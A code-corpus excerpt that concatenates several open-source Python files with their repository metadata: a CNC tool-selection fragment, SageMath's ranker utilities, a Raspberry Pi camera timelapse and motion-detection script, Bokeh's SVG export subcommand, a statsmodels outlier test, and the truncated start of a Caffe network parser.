self.tool_number = 0
else:
self.tool_number = default_tool.tool_number
if self.tool_number == 0:
first_tool = HeeksCNC.program.tools.FindFirstTool(TOOL_TYPE_SLOTCUTTER)
if first_tool:
self.tool_number = first_tool.tool_number
else:
first_tool = HeeksCNC.program.tools.FindFirstTool(TOOL_TYPE_ENDMILL)
if first_tool:
self.tool_number = first_tool.tool_number
else:
first_tool = HeeksCNC.program.tools.FindFirstTool(TOOL_TYPE_BALLENDMILL)
if first_tool:
self.tool_number = first_tool.tool_number
def WriteDefaultValues(self):
config = CNCConfig()
if self.tool_number != 0:
config.WriteInt("OpTool", self.tool_number)
def AppendTextToProgram(self):
if len(self.comment) > 0:
HeeksCNC.program.python_program += "comment(" + self.comment + ")\n"
if self.UsesTool():
HeeksCNC.machine_state.AppendToolChangeText(self.tool_number) # Select the correct tool.
| 34.151515
| 102
| 0.562112
|
0c32056c1dfd9798240d4e436b9cb7b5937e88e9
| 7,240
|
py
|
Python
|
src/sage/combinat/ranker.py
|
switzel/sage
|
7eb8510dacf61b691664cd8f1d2e75e5d473e5a0
|
[
"BSL-1.0"
] | null | null | null |
src/sage/combinat/ranker.py
|
switzel/sage
|
7eb8510dacf61b691664cd8f1d2e75e5d473e5a0
|
[
"BSL-1.0"
] | null | null | null |
src/sage/combinat/ranker.py
|
switzel/sage
|
7eb8510dacf61b691664cd8f1d2e75e5d473e5a0
|
[
"BSL-1.0"
] | 1
|
2020-07-24T12:20:37.000Z
|
2020-07-24T12:20:37.000Z
|
"""
Rankers
"""
#*****************************************************************************
# Copyright (C) 2007 Mike Hansen <mhansen@gmail.com>,
# Nicolas M. Thiery <nthiery at users.sf.net>
# Ported from MuPAD-Combinat (combinat::rankers)
#
# Distributed under the terms of the GNU General Public License (GPL)
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# The full text of the GPL is available at:
#
# http://www.gnu.org/licenses/
#*****************************************************************************
from collections import Iterable, Sequence
from sage.misc.cachefunc import cached_function
from sage.misc.callable_dict import CallableDict
from sage.structure.parent import Parent
from sage.categories.enumerated_sets import EnumeratedSets
def from_list(l):
"""
Returns a ranker from the list l.
INPUT:
- ``l`` - a list
OUTPUT:
- ``[rank, unrank]`` - functions
EXAMPLES::
sage: import sage.combinat.ranker as ranker
sage: l = [1,2,3]
sage: r,u = ranker.from_list(l)
sage: r(1)
0
sage: r(3)
2
sage: u(2)
3
sage: u(0)
1
"""
return [rank_from_list(l), unrank_from_list(l)]
def rank_from_list(l):
r"""
Return a rank function for the elements of ``l``.
INPUT:
- ``l`` -- a duplicate free list (or iterable) of hashable objects
OUTPUT:
- a function from the elements of ``l`` to ``0,...,len(l)``
EXAMPLES::
sage: import sage.combinat.ranker as ranker
sage: l = ['a', 'b', 'c']
sage: r = ranker.rank_from_list(l)
sage: r('a')
0
sage: r('c')
2
For non elements a ``ValueError`` is raised, as with the usual
``index`` method of lists::
sage: r('blah')
Traceback (most recent call last):
...
ValueError: 'blah' is not in dict
Currently, the rank function is a
:class:`~sage.misc.callable_dict.CallableDict`; but this is an
implementation detail::
sage: type(r)
<type 'sage.misc.callable_dict.CallableDict'>
sage: r
{'a': 0, 'c': 2, 'b': 1}
With the current implementation, no error is issued in case of
duplicate value in ``l``. Instead, the rank function returns the
position of some of the duplicates::
sage: r = ranker.rank_from_list(['a', 'b', 'a', 'c'])
sage: r('a')
2
Constructing the rank function itself is of complexity
``O(len(l))``. Then, each call to the rank function consists of an
essentially constant time dictionary lookup.
TESTS::
sage: TestSuite(r).run()
"""
return CallableDict((x,i) for i,x in enumerate(l))
def unrank_from_list(l):
"""
Returns an unrank function from a list.
EXAMPLES::
sage: import sage.combinat.ranker as ranker
sage: l = [1,2,3]
sage: u = ranker.unrank_from_list(l)
sage: u(2)
3
sage: u(0)
1
"""
unrank = lambda j: l[j]
return unrank
def on_fly():
"""
Returns a pair of enumeration functions rank / unrank.
rank assigns on the fly an integer, starting from 0, to any object
passed as argument. The object should be hashable. unrank is the
inverse function; it returns None for indices that have not yet
been assigned.
EXAMPLES::
sage: [rank, unrank] = sage.combinat.ranker.on_fly()
sage: rank('a')
0
sage: rank('b')
1
sage: rank('c')
2
sage: rank('a')
0
sage: unrank(2)
'c'
sage: unrank(3)
sage: rank('d')
3
sage: unrank(3)
'd'
.. todo:: add tests as in combinat::rankers
"""
def count():
i = 0
while True:
yield i
i+=1
counter = count()
@cached_function
def rank(x):
i = next(counter)
unrank.set_cache(x, i)
return i
@cached_function
def unrank(i):
return None
return [rank, unrank]
def unrank(L, i):
r"""
Return the `i`-th element of `L`.
INPUT:
- ``L`` -- a list, tuple, finite enumerated set, ...
- ``i`` -- an int or :class:`Integer`
The purpose of this utility is to give a uniform idiom to recover
the `i`-th element of an object ``L``, whether ``L`` is a list,
tuple (or more generally a :class:`collections.Sequence`), an
enumerated set, some old parent of Sage still implementing
unranking in the method ``__getitem__``, or an iterable (see
:class:`collections.Iterable`). See :trac:`15919`.
EXAMPLES:
Lists, tuples, and other :class:`sequences <collections.Sequence>`::
sage: from sage.combinat.ranker import unrank
sage: unrank(['a','b','c'], 2)
'c'
sage: unrank(('a','b','c'), 1)
'b'
sage: unrank(xrange(3,13,2), 1)
5
Enumerated sets::
sage: unrank(GF(7), 2)
2
sage: unrank(IntegerModRing(29), 10)
10
An old parent with unranking implemented in ``__getitem__``::
sage: M = MatrixSpace(GF(3), 2, 2)
sage: hasattr(M, "unrank")
False
sage: M[42]
[1 0]
[2 1]
sage: unrank(M, 42)
[1 0]
[2 1]
An iterable::
sage: unrank(NN,4)
4
An iterator::
sage: unrank(('a{}'.format(i) for i in range(20)), 0)
'a0'
sage: unrank(('a{}'.format(i) for i in range(20)), 2)
'a2'
.. WARNING::
When unranking an iterator, it returns the ``i``-th element
beyond where it is currently at::
sage: from sage.combinat.ranker import unrank
sage: it = iter(range(20))
sage: unrank(it, 2)
2
sage: unrank(it, 2)
5
TESTS::
sage: from sage.combinat.ranker import unrank
sage: unrank(range(3), 10)
Traceback (most recent call last):
...
IndexError: list index out of range
sage: unrank(('a{}'.format(i) for i in range(20)), 22)
Traceback (most recent call last):
...
IndexError: index out of range
sage: M[100]
Traceback (most recent call last):
...
IndexError: list index out of range
"""
if L in EnumeratedSets:
return L.unrank(i)
if isinstance(L, Sequence):
return L[i]
if isinstance(L, Parent):
# handle parents still implementing unranking in __getitem__
try:
return L[i]
except (AttributeError, TypeError, ValueError):
pass
if isinstance(L, Iterable):
try:
it = iter(L)
for _ in range(i):
next(it)
return next(it)
except StopIteration as e:
raise IndexError("index out of range")
raise ValueError("Don't know how to unrank on {}".format(L))
| 25.051903
| 78
| 0.549171
|
7a3051d00f38e0eff75bb168e585010e8a372ed4
| 16,015
|
py
|
Python
|
camera.py
|
Xorfor/Camera
|
7c60fad8099d3e25d67aaaf0c9755cdd114de024
|
[
"MIT"
] | 1
|
2019-09-12T05:14:21.000Z
|
2019-09-12T05:14:21.000Z
|
camera.py
|
Xorfor/Camera
|
7c60fad8099d3e25d67aaaf0c9755cdd114de024
|
[
"MIT"
] | null | null | null |
camera.py
|
Xorfor/Camera
|
7c60fad8099d3e25d67aaaf0c9755cdd114de024
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ================================================================================
# Based on:
# //github.com/pageauc/pi-timolo
# ================================================================================
# import RPi.GPIO as GPIO
import os
import datetime
import sys
import time
import picamera
import picamera.array
import logging
import modus
import signal
import io
import numpy as np
from fractions import Fraction
from config import *
# ================================================================================
# Constants
# ================================================================================
# Constant for converting Shutter Speed in Seconds to Microseconds
SECONDS2MICRO = 1000000
camNightISO = 800
camNightShutSpeed = 6 * SECONDS2MICRO
# ================================================================================
# System Variables, should not need to be customized
# ================================================================================
appName = "Camera"
appVersion = "0.2"
camera = picamera.PiCamera()
procesTime = 1
# --------------------------------------------------------------------------------
# Globals
# --------------------------------------------------------------------------------
actionCount = 0
imageCount = 1
motion_detected = False
last_still_capture_time = datetime.datetime.now()
imgExtension = "jpg"
# --------------------------------------------------------------------------------
# Logging
# --------------------------------------------------------------------------------
logging.basicConfig(
level=logging.WARNING,
format="[%(levelname)-8s] %(asctime)s %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
)
logger = logging.getLogger(__name__)
logger.setLevel(appLoggingLevel)
__MODI = [
modus.MOTIONIMAGE,
modus.MOTIONVIDEO,
modus.PIRIMAGE,
modus.PIRVIDEO,
modus.TESTIMAGE,
modus.TIMELAPSE,
]
# --------------------------------------------------------------------------------
# Setup PIR
# --------------------------------------------------------------------------------
# Setting the GPIO (General Purpose Input Output) pins up so we can detect if they are HIGH or LOW (on or off)
# GPIO.setmode(GPIO.BOARD)
# GPIO.setup(pirSensorPin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
# --------------------------------------------------------------------------------
# The 'analyse' method gets called on every frame processed while picamera
# is recording h264 video.
# It gets an array (see: "a") of motion vectors from the GPU.
# --------------------------------------------------------------------------------
def check_folders():
"""
This procedure will check for the image and video folders. If they don't exist,
the procedure will create them.
"""
logger.info("check_folders")
# Checks for image folders and creates them if they do not already exist.
if (
appModus == modus.TESTIMAGE
or appModus == modus.MOTIONIMAGE
or appModus == modus.TIMELAPSE
):
if not os.path.isdir(gbImageDir):
logger.debug("Creating image folder {}".format(gbImageDir))
os.makedirs(gbImageDir)
logger.debug("Folder {}".format(gbImageDir))
if appModus == modus.MOTIONVIDEO:
if not os.path.isdir(gbVideoDir):
logger.debug("Creating video folder {}".format(gbVideoDir))
os.makedirs(gbVideoDir)
logger.debug("Folder {}".format(gbVideoDir))
# --------------------------------------------------------------------------------
def signal_term_handler(signal, frame):
logger.critical("signal_term_handler")
# this raises SystemExit(0) which fires all "try...finally" blocks:
sys.exit(0)
# this is useful when this program is started at boot via init.d
# or an upstart script, so it can be killed: i.e. kill some_pid:
signal.signal(signal.SIGTERM, signal_term_handler)
# --------------------------------------------------------------------------------
def show_time():
return datetime.datetime.now().strftime(gbDateTimeFormat)
# --------------------------------------------------------------------------------
def ctrl_c():
logger.critical("ctrl_c")
# GPIO.cleanup()
# --------------------------------------------------------------------------------
def close_camera():
logger.info("close_camera")
camera.close()
# GPIO.cleanup()
logger.info("Actions: {}".format(actionCount))
logger.debug("Camera turned off")
# --------------------------------------------------------------------------------
def init_camera():
logger.info("init_camera")
revision = camera.revision
if revision == "ov5647":
version = "V1.x"
elif revision == "imx219":
version = "V2.x"
else:
version = "unknown"
logger.info("camera version: {}".format(version))
# Global settings
camera.resolution = (camHeight, camWidth)
camera.rotation = camRotation
camera.vflip = camVFlip
camera.hflip = camHFlip
logger.debug("camera.resolution = ({},{})".format(camWidth, camHeight))
logger.debug("camera.rotation = {}".format(camera.rotation))
logger.debug("camera.vflip = {}".format(camera.vflip))
logger.debug("camera.hflip = {}".format(camera.hflip))
# Specific settings
# Video settings
if appModus == modus.MOTIONVIDEO:
logger.debug("vidVideoTime = {}".format(vidVideoTime))
# Image settings
else:
logger.debug("camAnnotate = {}".format(camAnnotate))
if camAnnotate:
camera.annotate_text_size = camAnnotateTextSize
# camera.annotate_foreground = camAnnotateForeground
# camera.annotate_background = camAnnotateBackground
logger.debug(
"camera.annotate_text_size = {}".format(camera.annotate_text_size)
)
# logger.info( "camera.annotate_foreground = %s" % ( camera.annotate_foreground ) )
# logger.info( "camera.annotate_background = %s" % ( camera.annotate_background ) )
camera.framerate = camFrameRate
camera.led = camLed
camera.awb_mode = "auto"
if camDay:
camera.exposure_mode = "auto"
else:
camera.exposure_mode = "night"
logger.debug("camera.framerate = {}".format(camera.framerate))
logger.debug("camera.led = {}".format(camLed))
logger.debug("camera.exposure_mode = {}".format(camera.exposure_mode))
logger.debug("camera.awb_mode = {}".format(camera.awb_mode))
logger.debug("camera.shutter_speed = {}".format(camera.shutter_speed))
logger.debug("camera.iso = {}".format(camera.iso))
logger.info("Camera initialized")
# --------------------------------------------------------------------------------
def capture_image(fname):
""" This procedure will actually take the image and save the image as specified
by fname
Args:
fname : The filename to save the image
"""
logger.info("capture_image")
if camAnnotate:
camera.annotate_text = show_time()
logger.debug("image = {}".format(fname))
camera.capture(fname, imgFormat)
# --------------------------------------------------------------------------------
def write_video(stream):
""" Write the entire content of the circular buffer to disk. No need to
lock the stream here as we're definitely not writing to it simultaneously.
"""
logger.info("write_video")
with io.open("before.h264", "wb") as output:
for frame in stream.frames:
if frame.frame_type == picamera.PiVideoFrameType.sps_header:
stream.seek(frame.position)
break
while True:
buf = stream.read1()
if not buf:
break
output.write(buf)
# Wipe the circular stream once we're done
stream.seek(0)
stream.truncate()
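# --------------------------------------------------------------------------------
# A usage sketch for write_video(); PiCameraCircularIO is picamera's standard
# circular buffer, but the 20-second window is an arbitrary choice and running this
# requires an attached Raspberry Pi camera.
def example_record_with_circular_buffer(seconds=20):
    stream = picamera.PiCameraCircularIO(camera, seconds=seconds)
    camera.start_recording(stream, format="h264")
    try:
        camera.wait_recording(seconds)   # keep roughly the last <seconds> of footage buffered
        write_video(stream)              # dump the buffered footage to before.h264
    finally:
        camera.stop_recording()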
################################################################################
# Main procedures
################################################################################
def start_test_image():
""" This will make an image which can be used to position the camera and set
the configuration.
"""
logger.info("start_test_image")
global actionCount
init_camera()
logger.debug("Making test image")
capture_image(fname("test"))
actionCount += 1
logger.debug("Test image ended")
close_camera()
# --------------------------------------------------------------------------------
def start_timelapse():
""" This will take timelapse images. Images are stored with a sequence number.
"""
global imageCount
global actionCount
logger.info("start_timelapse")
try:
init_camera()
logger.info(
"This will take approx. {} sec.".format(tlTotalImages * tlTimeBetween)
)
imageCount = 0
while imageCount < tlTotalImages:
capture_image(
fname(str(tlSequenceStart + imageCount).zfill(tlSequenceSize))
)
logger.debug(
"TimeLapse {} = {}".format(imageCount, tlSequenceStart + imageCount)
)
imageCount += 1
actionCount += 1
# Takes roughly 6 seconds to take a picture
time.sleep(tlTimeBetween - procesTime)
except KeyboardInterrupt as e:
ctrl_c()
finally:
logger.info("Timelapse has ended.")
close_camera()
# --------------------------------------------------------------------------------
def start_motion_image():
logger.info("start_motion_image")
global motion_detected
global imageCount
global actionCount
init_camera()
imageCount = 1
with detect_motion(camera) as output:
try:
# record video to nowhere, as we are just trying to capture images:
camera.start_recording("/dev/null", format="h264", motion_output=output)
motion_detected = False
logger.debug("Waiting for motion...")
while True:
camera.wait_recording(mtnMinimumStillSec)
if motion_detected:
logger.debug("Stop recording and capture an image...")
camera.stop_recording()
capture_image(None)
imageCount += 1
actionCount += 1
camera.start_recording(
"/dev/null", format="h264", motion_output=output
)
motion_detected = False
logger.debug("Waiting for motion...")
except KeyboardInterrupt as e:
ctrl_c()
finally:
logger.info("Detect motion has ended.")
close_camera()
# --------------------------------------------------------------------------------
def start_motion_video():
logger.info("start_motion_video")
global motion_detected
global imageCount
global actionCount
init_camera()
imageCount = 1
fileStr = gbVideoDir + "/" + "mov" + "%s" + tlSuffix + ".h264"
with detect_motion(camera) as output:
try:
# record video to nowhere, as we are just trying to capture images:
camera.start_recording("/dev/null", format="h264", motion_output=output)
motion_detected = False
logger.debug("Waiting for motion...")
while True:
camera.wait_recording(mtnMinimumStillSec)
if motion_detected:
logger.debug("Recording video...")
camera.stop_recording()
camera.start_recording(fileStr % imageCount, format="h264")
camera.wait_recording(vidVideoTime)
camera.stop_recording()
imageCount += 1
actionCount += 1
camera.start_recording(
"/dev/null", format="h264", motion_output=output
)
motion_detected = False
logger.debug("Waiting for motion...")
except KeyboardInterrupt as e:
ctrl_c()
finally:
logger.debug("Detect motion has ended.")
close_camera()
# --------------------------------------------------------------------------------
def start_pir_image():
logger.info("start_pir_image")
global imageCount
global actionCount
init_camera()
imageCount = 1
try:
# Defining our default states so we can detect a change
prev_state = False
curr_state = False
logger.debug("Waiting for motion...")
while True:
time.sleep(0.1)
prev_state = curr_state
# Map the state of the camera to our input pins (jumper cables connected to your PIR)
# curr_state = GPIO.input(pirSensorPin)
# Checking whether the state has changed
if curr_state != prev_state:
# Check if our new state is HIGH or LOW
new_state = "HIGH" if curr_state else "LOW"
logger.debug("GPIO pin {} is {}".format(pirSensorPin, new_state))
if (
curr_state
): # State has changed to HIGH, so that must be a trigger from the PIR
capture_image(None)
imageCount += 1
actionCount += 1
    except KeyboardInterrupt as e:
        # Mirror the other handlers: clean up on Ctrl-C instead of constructing an unused exception.
        ctrl_c()
finally:
logger.debug("Detect PIR Image has ended.")
close_camera()
# --------------------------------------------------------------------------------
def start_pir_motion():
logger.info("start_pir_motion")
# ================================================================================
# Helper functions
# ================================================================================
def fname(name):
logger.debug("fname")
return "{}/{}{}{}{}".format(gbImageDir, tlPrefix, name, tlSuffix, imgExtension)
# ********************************************************************************
class detect_motion(picamera.array.PiMotionAnalysis):
def analyse(self, a):
global motion_detected, last_still_capture_time
if datetime.datetime.now() > last_still_capture_time + datetime.timedelta(
seconds=mtnMinimumStillSec
):
a = (
np.sqrt(
                    np.square(a["x"].astype(np.float64))
                    + np.square(a["y"].astype(np.float64))
)
.clip(0, 255)
.astype(np.uint8)
)
            # Experiment with the following "if", as it may be too sensitive.
            # If there are more than 10 vectors with a magnitude greater than mtnMagnitude, motion is detected:
if (a > mtnMagnitude).sum() > 10:
logger.debug("Motion detected")
motion_detected = True
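# A standalone numpy sketch (synthetic motion vectors, not taken from the GPU) of the
# same magnitude test used in detect_motion.analyse(); the threshold of 60 and the
# count of 10 vectors are only example values.
def example_motion_test(mx, my, magnitude_threshold=60, min_vectors=10):
    mag = (np.sqrt(np.square(mx.astype(np.float64)) + np.square(my.astype(np.float64)))
           .clip(0, 255).astype(np.uint8))
    return (mag > magnitude_threshold).sum() > min_vectors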
def main():
global imgExtension
logger.info("Starting {} {}".format(appName, appVersion))
logger.info("Modus = {}".format(appModus))
check_folders()
if imgFormat == "jpeg":
imgExtension = ".jpg"
else:
imgExtension = "." + imgFormat
if appModus == modus.TESTIMAGE:
start_test_image()
elif appModus == modus.TIMELAPSE:
start_timelapse()
elif appModus == modus.MOTIONIMAGE:
start_motion_image()
elif appModus == modus.MOTIONVIDEO:
start_motion_video()
elif appModus == modus.PIRIMAGE:
start_pir_image()
elif appModus == modus.PIRVIDEO:
start_pir_motion()
else:
logger.error("Invalid modus: {}".format(appModus))
# ********************************************************************************
if __name__ == "__main__":
try:
main()
finally:
logger.debug("{} ended".format(appName))
| 31.966068
| 110
| 0.510209
|
f1bd8f9fea120a41d0ac1b89ce6d2543d98d1a01
| 3,809
|
py
|
Python
|
bokeh/command/subcommands/svg.py
|
DuCorey/bokeh
|
a88e24f34d40499a4608d01da8d706123350b4e6
|
[
"BSD-3-Clause"
] | 1
|
2020-02-06T05:27:53.000Z
|
2020-02-06T05:27:53.000Z
|
bokeh/command/subcommands/svg.py
|
DuCorey/bokeh
|
a88e24f34d40499a4608d01da8d706123350b4e6
|
[
"BSD-3-Clause"
] | null | null | null |
bokeh/command/subcommands/svg.py
|
DuCorey/bokeh
|
a88e24f34d40499a4608d01da8d706123350b4e6
|
[
"BSD-3-Clause"
] | null | null | null |
'''
To generate standalone SVGs for a Bokeh application from a single
Python script, pass the script name to ``bokeh svg`` on the command
line:
.. code-block:: sh
bokeh svg app_script.py
The generated SVGs will be saved in the current working directory with
the name ``app_script.svg``. If there are multiple SVGs within an application,
the subsequent ones will be named ``app_script_1.svg``, ``app_script_2.svg``,
etc.
It is also possible to run the same command with Jupyter notebooks:
.. code-block:: sh
bokeh svg app_notebook.ipynb
This will generate SVG files named ``app_notebook_{n}.svg`` just like
with a python script.
Applications can also be created from directories. The directory should
contain a ``main.py`` (and any other helper modules that are required) as
well as any additional assets (e.g., theme files). Pass the directory name
to ``bokeh svg`` to generate the SVG:
.. code-block:: sh
bokeh svg app_dir
It is possible to generate SVG files for multiple applications at once:
.. code-block:: sh
bokeh svg app_script.py app_dir
For all cases, it's required to explicitly add a Bokeh layout to
``bokeh.io.curdoc`` for it to appear in the output.
'''
from __future__ import absolute_import
import io
import os
import warnings
from bokeh.io import _get_svgs
from bokeh.models import Plot
from bokeh.util.string import decode_utf8
from .file_output import FileOutputSubcommand
class SVG(FileOutputSubcommand):
''' Subcommand to output applications as standalone SVG files.
'''
#: name for this subcommand
name = "svg"
#: file extension for output generated by this :class:`~bokeh.command.subcommands.file_output.FileOutputSubcommand`
extension = "svg"
help = "Create standalone SVG files for one or more applications"
args = (
FileOutputSubcommand.files_arg("SVG"),
('--height', dict(
metavar='HEIGHT',
type=int,
help="The desired height of the exported layout obj only if it's a Plot instance",
default=None,
)),
('--width', dict(
metavar='WIDTH',
type=int,
help="The desired width of the exported layout obj only if it's a Plot instance",
default=None,
)),
) + FileOutputSubcommand.other_args()
def invoke(self, args):
'''
'''
import selenium.webdriver as webdriver
self.driver = webdriver.PhantomJS(service_log_path=os.path.devnull)
super(SVG, self).invoke(args)
self.driver.quit()
def write_file(self, args, filename, doc):
'''
'''
contents = self.file_contents(args, doc)
for i, svg in enumerate(contents):
if filename == '-':
print(decode_utf8(svg))
else:
if i == 0:
filename = filename
else:
idx = filename.find(".svg")
filename = filename[:idx] + "_{}".format(i) + filename[idx:]
with io.open(filename, "w", encoding="utf-8") as f:
f.write(decode_utf8(svg))
self.after_write_file(args, filename, doc)
def file_contents(self, args, doc):
'''
'''
if args.width is not None or args.height is not None:
layout = doc.roots
if len(layout) != 1 or not isinstance(layout[0], Plot):
warnings.warn("Export called with height or width kwargs on a non-single Plot layout. The size values will be ignored.")
else:
plot = layout[0]
plot.plot_height = args.height or plot.plot_height
plot.plot_width = args.width or plot.plot_width
return _get_svgs(doc, driver=self.driver)
| 29.992126
| 136
| 0.632187
|
874983d5d0b0d4babd2506c1ace1254022b2bf47
| 958
|
py
|
Python
|
venv/lib/python3.8/site-packages/statsmodels/stats/tests/test_outliers_influence.py
|
johncollinsai/post-high-frequency-data
|
88533b0e0afc7e7f82fee1d3ca4b68abc30aaeb4
|
[
"MIT"
] | 12
|
2018-09-03T14:48:13.000Z
|
2021-11-28T13:08:15.000Z
|
venv/lib/python3.8/site-packages/statsmodels/stats/tests/test_outliers_influence.py
|
johncollinsai/post-high-frequency-data
|
88533b0e0afc7e7f82fee1d3ca4b68abc30aaeb4
|
[
"MIT"
] | 5
|
2022-02-13T14:38:04.000Z
|
2022-02-15T00:13:07.000Z
|
venv/lib/python3.8/site-packages/statsmodels/stats/tests/test_outliers_influence.py
|
johncollinsai/post-high-frequency-data
|
88533b0e0afc7e7f82fee1d3ca4b68abc30aaeb4
|
[
"MIT"
] | 6
|
2018-02-18T12:42:41.000Z
|
2020-08-07T10:36:29.000Z
|
import numpy as np
from numpy.testing import assert_almost_equal
from statsmodels.datasets import statecrime
from statsmodels.regression.linear_model import OLS
from statsmodels.stats.outliers_influence import (
reset_ramsey,
variance_inflation_factor,
)
from statsmodels.tools import add_constant
def test_reset_stata():
data = statecrime.load_pandas().data
mod = OLS(data.violent, add_constant(data[["murder", "hs_grad"]]))
res = mod.fit()
stat = reset_ramsey(res, degree=4)
assert_almost_equal(stat.fvalue, 1.52, decimal=2)
assert_almost_equal(stat.pvalue, 0.2221, decimal=4)
exog_idx = list(data.columns).index("urban")
data_arr = np.asarray(data)
vif = variance_inflation_factor(data_arr, exog_idx)
assert_almost_equal(vif, 16.4394, decimal=4)
exog_idx = list(data.columns).index("urban")
vif_df = variance_inflation_factor(data, exog_idx)
assert_almost_equal(vif_df, 16.4394, decimal=4)
| 33.034483
| 70
| 0.751566
|
d956eae5bfcbf99b8477449a239e06a56103c164
| 62,468
|
py
|
Python
|
tool/Controllers/CaffeParser.py
|
HornedSungem/SungemSDK-Python
|
5ce5eb7f84654aecf6840de773188f436219559d
|
[
"Apache-2.0"
] | 14
|
2018-08-16T09:11:39.000Z
|
2019-12-07T12:54:32.000Z
|
tool/Controllers/CaffeParser.py
|
HornedSungem/SungemSDK-Python
|
5ce5eb7f84654aecf6840de773188f436219559d
|
[
"Apache-2.0"
] | 2
|
2019-08-23T23:31:10.000Z
|
2020-06-17T09:21:57.000Z
|
tool/Controllers/CaffeParser.py
|
HornedSungem/SungemSDK-Python
|
5ce5eb7f84654aecf6840de773188f436219559d
|
[
"Apache-2.0"
] | 7
|
2018-10-02T01:46:43.000Z
|
2021-06-04T19:10:47.000Z
|
# Copyright 2017 Intel Corporation.
# The source code, information and material ("Material") contained herein is
# owned by Intel Corporation or its suppliers or licensors, and title to such
# Material remains with Intel Corporation or its suppliers or licensors.
# The Material contains proprietary information of Intel or its suppliers and
# licensors. The Material is protected by worldwide copyright laws and treaty
# provisions.
# No part of the Material may be used, copied, reproduced, modified, published,
# uploaded, posted, transmitted, distributed or disclosed in any way without
# Intel's prior express written permission. No license under any patent,
# copyright or other intellectual property rights in the Material is granted to
# or conferred upon you, either expressly, by implication, inducement, estoppel
# or otherwise.
# Any license under such intellectual property rights must be express and
# approved by Intel in writing.
import numpy as np
from Models.NetworkStage import *
from Models.Network import *
from Controllers.CaffeEnumController import *
from Controllers.MiscIO import *
from google.protobuf import message
from google.protobuf import text_format
import os
import ctypes
import sys, pdb
sys.path.insert(0,'caffe/python')
import caffe
from caffe.proto import caffe_pb2
concat_tracker = []
slice_tracker = []
data_type = np.float16
def caffe_search_pre_op(msg, name):
if False:
pass
return None
def get_caffe_kernel_size(layer):
if isConvolution(layer.type):
if layer.convolution_param.kernel_w:
return layer.convolution_param.kernel_h, layer.convolution_param.kernel_w
else:
return layer.convolution_param.kernel_size[0], layer.convolution_param.kernel_size[0]
if isPooling(layer.type):
if layer.pooling_param.kernel_w:
return layer.pooling_param.kernel_h, layer.pooling_param.kernel_w
else:
return layer.pooling_param.kernel_size, layer.pooling_param.kernel_size
if isDeconvolution(layer.type):
if layer.convolution_param.kernel_w:
return layer.convolution_param.kernel_h, layer.convolution_param.kernel_w
else:
return layer.convolution_param.kernel_size[0], layer.convolution_param.kernel_size[0]
return 0, 0 # Default
def get_caffe_group(layer):
if isConvolution(layer.type):
return layer.convolution_param.group
if isDeconvolution(layer.type):
return layer.convolution_param.group
return 1
def get_caffe_output_channels(layer, prev_output_shape, top, network):
if isConvolution(layer.type):
return layer.convolution_param.num_output
if isFCL(layer.type):
return layer.inner_product_param.num_output
if isReshape(layer.type):
return layer.reshape_param.shape[0]
if (isPooling(layer.type) or isSoftMax(layer.type) or isLRN(layer.type) or
isSigmoid(layer.type) or isTanH(layer.type) or isPower(layer.type) or
isNormalize(layer.type)):
if top is not None:
if (len(top) > 1):
sum_of_k_from_parents = 0
for parent in top:
prev_node = network.search(parent)
sum_of_k_from_parents += prev_node.output.shape[0]
return sum_of_k_from_parents
return prev_output_shape[0]
if (isEltwise(layer.type) or isBatchNorm(layer.type) or
isScale(layer.type) or isPReLU(layer.type)):
return prev_output_shape[0]
if isDeconvolution(layer.type):
return layer.convolution_param.num_output
if isFlatten(layer.type):
return prev_output_shape[0] * \
prev_output_shape[1] * prev_output_shape[2]
if isPermute(layer.type):
return prev_output_shape[layer.permute_param.order[1]-1]
if isPriorBox(layer.type):
return 1
# print("Parse Warning: Default OutputChannels being used.")
return 1 # default case
def get_caffe_op_radix(layer):
"""
Get the radix of the operation from this layer (single kernel dimensions).
    Currently assumes square kernels, since there are no Caffe examples with non-square (vector) kernels.
TODO: Find some examples
:param layer:
:return:
"""
if isConvolution(layer.type):
if layer.convolution_param.kernel_w:
return layer.convolution_param.kernel_h, layer.convolution_param.kernel_w
else:
return layer.convolution_param.kernel_size[0], layer.convolution_param.kernel_size[0]
elif isLRN(layer.type):
return 0, layer.lrn_param.local_size
elif isPooling(layer.type):
if layer.pooling_param.kernel_size == 0:
if(layer.pooling_param.global_pooling):
return -1, -1
if layer.pooling_param.kernel_w:
return layer.pooling_param.kernel_h, layer.pooling_param.kernel_w
else:
return layer.pooling_param.kernel_size, layer.pooling_param.kernel_size
elif isPooling(layer.type):
return layer.pooling_param.kernel_size, layer.pooling_param.kernel_size
elif isDeconvolution(layer.type):
if layer.convolution_param.kernel_w:
return layer.convolution_param.kernel_h, layer.convolution_param.kernel_w
else:
return layer.convolution_param.kernel_size[0], layer.convolution_param.kernel_size[0]
else:
return 1, 1
def get_caffe_op_padding(layer):
if isConvolution(layer.type) or isDeconvolution(layer.type):
if layer.convolution_param.pad_w or layer.convolution_param.pad_h:
return layer.convolution_param.pad_h, layer.convolution_param.pad_w
elif layer.convolution_param.pad:
return layer.convolution_param.pad[0], layer.convolution_param.pad[0]
if isPooling(layer.type):
if layer.pooling_param.pad_w or layer.pooling_param.pad_h:
return layer.pooling_param.pad_h, layer.pooling_param.pad_w
elif layer.pooling_param.pad:
return layer.pooling_param.pad, layer.pooling_param.pad
return 0, 0 # Default Case
def get_caffe_op_stride(layer):
"""
    Get a layer's stride for the operation. Caffe typically specifies a single stride value, which is applied to both dimensions unless stride_h/stride_w are given.
:param layer:
:return: a tuple for stride dimensions X,Y
"""
if isConvolution(layer.type):
if layer.convolution_param.stride_w:
return layer.convolution_param.stride_h, layer.convolution_param.stride_w
elif layer.convolution_param.stride:
return layer.convolution_param.stride[0], layer.convolution_param.stride[0]
if isPooling(layer.type):
if layer.pooling_param.stride_w:
return layer.pooling_param.stride_h, layer.pooling_param.stride_w
elif layer.pooling_param.stride:
return layer.pooling_param.stride, layer.pooling_param.stride
if isDeconvolution(layer.type):
if layer.convolution_param.stride_w:
return layer.convolution_param.stride_h, layer.convolution_param.stride_w
elif layer.convolution_param.stride:
return layer.convolution_param.stride[0], layer.convolution_param.stride[0]
return 1, 1 # Default Case
def get_caffe_params(layer, blobs):
global data_type
if isLRN(layer.type):
# The latest 0 is just for alignment, it can be removed
# after UsbLink has been fixed
return None, np.array(
